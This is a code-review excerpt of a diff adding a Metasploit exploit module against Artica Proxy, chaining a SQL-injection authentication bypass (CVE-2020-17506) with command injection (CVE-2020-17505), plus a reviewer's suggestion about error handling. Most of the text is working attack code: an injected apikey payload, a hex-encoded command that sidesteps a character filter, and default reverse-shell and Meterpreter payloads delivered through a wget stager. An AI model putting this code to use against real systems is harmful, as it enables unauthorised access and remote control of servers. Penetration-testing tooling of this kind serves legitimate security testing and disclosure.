modules/exploits/linux/http/artica_proxy_rce.rb

```diff
@@ -0,0 +1,136 @@
+        'Targets' => [
+          [
+            'Unix Command',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Type' => :unix_command,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_bash'
+            }
+          ],
+          [
+            'Linux Dropper',
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :linux_dropper,
+            'DefaultOptions' => {
+              'CMDSTAGER::FLAVOR' => 'wget',
+              'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+            }
+          ],
+          [
+            'Authentication bypass',
+            'Platform' => 'Linux',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :auth_bypass,
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => 'Aug 9 2020',
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/']),
+        OptString.new('PHPSESSID', [false, 'The cookie obtained after successful authentication, if present'])
+      ]
+    )
+
+    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
+    import_target_defaults
+  end
+
+  def execute_command(cmd, _opts = {})
+    # particularity: cmd can't contain spaces, or some characters from a blacklist (+ included for example)
+    print_status 'Attempting to gain RCE via CVE-2020-17505'
+    # this should bypass the filtering
+    cmd = "echo #{Rex::Text.to_hex(cmd, '')}|xxd -r -p|sh".gsub(/ /, '${IFS}')
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'),
+      'vars_get' => {
+        'service-cmds-peform' => "||#{cmd}||"
+      },
+      'cookie' => "PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1"
+    })
+  end
+
+  def auth_bypass
+    print_status 'Attempting to bypass authentication via CVE-2020-17506 (SQL injection)'
+    apikey = "' UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'fw.login.php'),
+      'vars_get' => {
+        'apikey' => apikey
+      }
+    })
+    if res && [200, 301, 302].include?(res.code)
+      cookie = res.get_cookies
+      unless cookie.nil? || !cookie.include?('PHPSESSID=')
+        print_good "Got authentication cookie: #{cookie}"
+        return cookie[/PHPSESSID=(.+?);/, 1]
+      end
+    end
+    print_error 'Failed to bypass the authentication via CVE-2020-17506'
+    nil
+  end
+
+  def exploit
+    @phpsessid = datastore['PHPSESSID'] || auth_bypass
+    return unless @phpsessid
```

Comment:
A `fail_with` would be more appropriate here.

```suggestion
    unless @phpsessid
      fail_with(Failure::NoAccess, "Authentication failed")
    end
```